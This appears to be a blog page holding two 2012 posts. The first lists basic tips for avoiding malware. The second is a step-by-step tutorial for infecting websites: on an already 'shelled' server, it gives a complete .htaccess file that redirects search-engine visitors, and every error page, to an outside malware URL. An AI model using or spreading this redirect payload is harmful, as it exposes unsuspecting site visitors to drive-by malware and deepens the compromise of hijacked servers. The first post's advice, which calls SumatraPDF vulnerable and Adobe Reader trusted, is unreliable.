Showing posts with label malware. Show all posts
Showing posts with label malware. Show all posts

Friday, 22 June 2012

How To Prevent From Malware Infection


Today Malware infection is common on internet which cause harm to PC so here are some points by which you can prevent your PC from Malicious Attacks and Infection
  • Anti-Virus should be up to date and from trusted company.
  • System and all software should also up to date
  • Avoid websites which are known to have malware in the past.
  • Always use the browser protection plugin,such as No-script, which effectively prevents most drive-by downloads
  • Do not use Vulnerable software always like SumatraPDF used always trusted one like Adobe Reader
  • Do not follow the links in emails,social media websites, without verifying the sender
  • Do not Download or execute programs from untrusted websites.
  • Always Aware Of Spams Site

Wednesday, 25 April 2012

Infecting Websites With Malware

Today i will show you all how to infect sites with malware in few steps ;) .

Things Required :
  • Shelled Server
  • Access to .htacess file 

Step By Step Tutorial :
  • open your shell & then find .htacess file .








  • Then now we will edit it, replace everything with the code given below .


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]
RewriteEngine On
ErrorDocument 400 http://villusoftreit.ru/in.cgi?3
ErrorDocument 401 http://villusoftreit.ru/in.cgi?3
ErrorDocument 403 http://villusoftreit.ru/in.cgi?3
ErrorDocument 404 http://villusoftreit.ru/in.cgi?3
ErrorDocument 500 http://villusoftreit.ru/in.cgi?3

}


  • Now save the .htacess file . Viola! you have successfully infected the server with Malware .